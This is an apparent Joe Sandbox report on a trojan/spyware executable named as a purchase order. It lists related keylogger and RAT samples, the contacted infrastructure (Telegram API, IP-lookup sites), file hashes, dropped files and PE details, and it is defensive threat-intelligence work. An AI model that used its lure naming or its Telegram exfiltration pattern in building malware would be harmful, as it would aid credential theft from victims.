Start date and time:	2024-12-16 14:13:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/8@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 135 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 23.218.208.109, 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Simulations

Behavior and APIs

Time	Type	Description
08:14:07	API Interceptor	6148220x Sleep call for process: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe modified
08:14:09	API Interceptor	9x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	conferma..exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
149.154.167.220	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig	Browse
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	gjvU5KOFhX.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse
	hvqc3lk7ly.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	HA9wRLGT9y.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	8Bd1K3FM7v.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	Statement Of Account - (USD 19,490.00 ).xls	Get hash	malicious	Unknown	Browse	199.232.214.172
	A6IuJ5NneS.lnk	Get hash	malicious	LummaC	Browse	199.232.210.172
	jignesh.exe	Get hash	malicious	Quasar	Browse	199.232.214.172
	skibidi.exe	Get hash	malicious	Quasar	Browse	199.232.214.172
	vanilla.exe	Get hash	malicious	Quasar	Browse	199.232.214.172
	ImageMso.Gallery.xll	Get hash	malicious	Unknown	Browse	199.232.210.172
	Setup.msi	Get hash	malicious	Vidar	Browse	199.232.214.172
	DVW8WyapUR.exe	Get hash	malicious	Spyrix Keylogger	Browse	199.232.210.172
api.telegram.org	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	149.154.167.220
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	149.154.167.220
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	gjvU5KOFhX.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	149.154.167.220
	hvqc3lk7ly.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
reallyfreegeoip.org	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	file.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	149.154.167.99
	njrtdhadawt.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, Vidar, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	149.154.167.99
	lem.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
UTMEMUS	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	conferma..exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
CLOUDFLARENETUS	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	54FApnc7eR.exe	Get hash	malicious	LummaC	Browse	172.67.177.250
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PO.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	https://www.sendspace.com/pro/dl/m2hhc1	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://protect.checkpoint.com/v2/r02/___https://url1251.popmenu.com/qxdhqnhp?zus=z556.WRHPCjsgt/tA51B6LI9w4BubTYwM5p/-7KrggkVEpmPU5/oVFKKM8Rk6rAnqtQtILc2Q2H_3u9DiXC41Sfynx8MyN~gGwOol/aO3BY~pgD37kbc4-7KGmCSO4DHGqcB~D2S053knP-7G~y37ScDgrX/lhFDF7r7h5Gwz-7GtvZLu~h33zX5RXwSF0oDJX34CSZAvVXm4AFQJ-7Gq-7KxI/mcm4qvQmbxushMLQI9uHWfHKaPI5mifSCu5iVBRcvqUxu7JB4CzzH~tp7hI~P2JxcRqKbjQDa1m4EV2vJju-7KXGYhKkA/NMg4b3nlprWADF7NLfLtJTf5xKVlxz1PBE~XIwKJANjSZxzJHsTEzwI07xTpBPmh9cjRp3bNxF-8I___.YzJlOm1zbm90aWZ5OmM6bzphNDQ0NjUwYTgwNjk4YzE1YzQzODY0NjgzZWZkNGFjNzo3Ojk1N2U6NjEyMTFiMTNiOTljZDFhYmUzOWRiNzM5NDE0NGE3NDNhMDJkZjlhMmI1NzgzMzhlZTAwMjhmZTBkODVlNWNmZDpoOlQ6VA	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	172.67.220.198
	https://login.corp-internal.org/17058d3d8656ed69?l=27	Get hash	malicious	Unknown	Browse	104.16.99.29

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	172.67.177.134
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	Tvl72VM6PM.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	Tvl72VM6PM.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ZppxPm0ASs.exe	Get hash	malicious	Xmrig	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	rQuotation.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	149.154.167.220
	invoice.html	Get hash	malicious	Unknown	Browse	149.154.167.220
	rDOC24INV0616.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://t.co/eSJUUrWOcO	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	InvoiceNr274728.pdf.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.2539954282295116
Encrypted:	false
SSDEEP:	6:kK199UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:tkDImsLNkPlE99SNxAhUe/3
MD5:	0757283C51BC21AD0DB5158F8F14B7A0
SHA1:	352BF7F8251C7CC091E44B50CE9DD3FE74C5B56B
SHA-256:	BCCF0A21B6526808C98C6CC5CD2298474A381B181249AFE3D34D5C317F6C66FE
SHA-512:	944608EFFF4CB733C473C50D40F89813147C5A7D0FCB3F93BBA09FD931A1676DD4208E1F3C748BF5668944B064C72360E5040C074CDC29D9CBDE29E84C5CF21A
Malicious:	false
Reputation:	low
Preview:	p...... ................(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.log

Download File

Process:	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.354777075714867
Encrypted:	false
SSDEEP:	24:3gWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:QWSU4xympjms4RIoU99tK8NDv
MD5:	F614CCA1D985910D63FFFF70966F53F5
SHA1:	A9BD00A65E13088BD96A2420E289487CD07D9D4C
SHA-256:	3714147C391F57DCDB11C8D0E7076367B3BD1D628A5FB73E2BEE67B99F034157
SHA-512:	AE362137DA68C2853EB39BC2EC5A6AD2361689225F28337F0738617D6DB986E4BCF985FE12E910405E621CE407B4E6AF3308ADDDE4F9D81E02F2ED8E27831CAE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_timm110q.uub.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vql3nvnb.wkv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxcxcazm.2v2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsok3sld.g2j.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.700512393501766
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
File size:	792'064 bytes
MD5:	4b393b41e5b7bdd02e481816bec9ff4a
SHA1:	35b60bdfa5130cc88b508f4fee9c226a2277517b
SHA256:	b71fb82589e3532a9390352bc87f7c2edc2cd7fae723fe203500350a31559e17
SHA512:	28ae160172d1d13a8b56dac51dd38f44c1cbf2c4755300d34adfc5c5638ee2375bc7cf8b29e8173933f0f3e672cd2e8e8469fa341e3356a0c7e34153e08ac0e3
SSDEEP:	12288:ipdY9shQgZCnoCKpJTH7uag0rQ8Vt7W68RNkBXKU5YYyTAo187Ce6m05/W:WdhlyzKrHSaVrQ8i6UkxKVaSR7m05/
TLSH:	34F401A4BB5ED403C99116354EB1F2B912689E9DF912E213AFED7FEF7C726051C04282
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tpVg..............0......(........... ... ....@.. ....................................@................................

File Icon


Icon Hash:	17692632b3936907

Static PE Info

General

Entrypoint:	0x4c0b9a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67567074 [Mon Dec 9 04:22:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007F9F8CCDC0D2h
je 00007F9F8CCDC0D2h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007F9F8CCDC0D2h
imul eax, dword ptr [eax], 00610076h
je 00007F9F8CCDC0D2h
outsd
add byte ptr [edx+00h], dh
push ebx
add byte ptr [ecx+00h], bh
jnc 00007F9F8CCDC0D2h
je 00007F9F8CCDC0D2h
add byte ptr [ebp+00h], ch
add byte ptr [edx+00h], dl
add byte ptr [esi+00h], ah
insb
add byte ptr [ebp+00h], ah
arpl word ptr [eax], ax
je 00007F9F8CCDC0D2h
imul eax, dword ptr [eax], 006E006Fh
add byte ptr [ecx+00h], al
jnc 00007F9F8CCDC0D2h
jnc 00007F9F8CCDC0D2h
add byte ptr [ebp+00h], ch
bound eax, dword ptr [eax]
insb
add byte ptr [ecx+00h], bh
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
add byte ptr [edi+00h], ch
popad
add byte ptr [eax+eax+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
